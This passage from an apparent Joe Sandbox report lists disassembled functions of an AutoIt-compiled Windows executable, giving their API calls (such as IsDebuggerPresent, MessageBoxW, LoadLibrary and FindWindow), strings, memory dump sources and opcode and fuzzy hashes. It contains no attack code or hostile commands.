                                                  • Instruction ID: 34050569339bd020468ba851438bb7bb9bb6339529dedaab15a2ad10a3096cd8
                                                  • Opcode Fuzzy Hash: 2b20ec606c40a67039907a1afe522193be5868f62c3c8b452641ccde4f7e04eb
                                                  • Instruction Fuzzy Hash: E5E09B3250022867D7109695AC4ABA7F7ECEB55B60F000066FD14D3151D5609A4587E0
                                                  Function 00BFB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BFB314: _memset.LIBCMT ref: 00BFB321
                                                    • Part of subcall function 00BE0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BFB2F0,?,?,?,00BC100A), ref: 00BE0945
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00BC100A), ref: 00BFB2F4
                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BC100A), ref: 00BFB303
                                                  Strings
                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BFB2FE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                  • API String ID: 3158253471-631824599
                                                  • Opcode ID: e5f699f4c18c8091615120019f6c95b0a558d1d53fbf09b52693ee6effd54bc1
                                                  • Instruction ID: 6e657a632182ea729f42616725f6c25eecc5d3aea3753a1334328e15fe548225
                                                  • Opcode Fuzzy Hash: e5f699f4c18c8091615120019f6c95b0a558d1d53fbf09b52693ee6effd54bc1
                                                  • Instruction Fuzzy Hash: 53E06DB46007048BDB30AF28E404B567AE4BF00358F0189BDE486C7251EBF5D848CBA1
                                                  Function 00C17C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C17C82
                                                    • Part of subcall function 00BE3358: _doexit.LIBCMT ref: 00BE3362
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Message_doexit
                                                  • String ID: AutoIt$Error allocating memory.
                                                  • API String ID: 1993061046-4017498283
                                                  • Opcode ID: 67259fcf211c74a507ca157a0b6897ca870f261239bc4b17dafbe08c31d2f4f3
                                                  • Instruction ID: c72752bbead7ad9ee179bb690cb3058a1ecb6cbad6102adaa61bd6d22eb6a4ac
                                                  • Opcode Fuzzy Hash: 67259fcf211c74a507ca157a0b6897ca870f261239bc4b17dafbe08c31d2f4f3
                                                  • Instruction Fuzzy Hash: ECD05B323C436836D11532A56C0BFDE79C84F06F52F044475FF08595D38AD255C151E9
                                                  Function 00C01935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(?), ref: 00C01775
                                                    • Part of subcall function 00C3BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00C0195E,?), ref: 00C3BFFE
                                                    • Part of subcall function 00C3BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C3C010
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C0196D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                  • String ID: WIN_XPe
                                                  • API String ID: 582185067-3257408948
                                                  • Opcode ID: 11d5dfde17bc45424e649ddd3dc3a46ee454a1febcf0ea2b9e866fe14394a135
                                                  • Instruction ID: d55fd74df8f04a690389703f5236fbae3f85e55410472fef43c2e1bf32ec463c
                                                  • Opcode Fuzzy Hash: 11d5dfde17bc45424e649ddd3dc3a46ee454a1febcf0ea2b9e866fe14394a135
                                                  • Instruction Fuzzy Hash: 85F0E570800109DFDB15DFA9CA88BECBBF8BB18305F680099E512A71A0D7718F85DF61
                                                  Function 00C45998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C459AE
                                                  • PostMessageW.USER32(00000000), ref: 00C459B5
                                                    • Part of subcall function 00C25244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C252BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: a87a0f36a79e6d4cc61fd2d5f915d8e1fffc08d1f6bc00c28fa36e5e7862a1a2
                                                  • Instruction ID: b0fd9a172dd805dad5cbb5708ddc4665408408c62d173051a9467aa94c773d1f
                                                  • Opcode Fuzzy Hash: a87a0f36a79e6d4cc61fd2d5f915d8e1fffc08d1f6bc00c28fa36e5e7862a1a2
                                                  • Instruction Fuzzy Hash: 90D012357C4311BBF6A4BB70AC0FFDB6614BB05B50F010839B349EA5D0D9F0A801C654
                                                  Function 00C45964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C4596E
                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C45981
                                                    • Part of subcall function 00C25244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C252BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: e610a88a353087351b7c022fe445bb42903ffde6d5f5f04716b494c937d708d3
                                                  • Instruction ID: 3ba23115c6a31149c0b72629fedb5274055ec81c9418acbbf8211af5a8acbdee
                                                  • Opcode Fuzzy Hash: e610a88a353087351b7c022fe445bb42903ffde6d5f5f04716b494c937d708d3
                                                  • Instruction Fuzzy Hash: 94D012357C4311B7E6A4BB70AC0FFDB6A14BF01B50F010839B349AA5D0D9F09801C654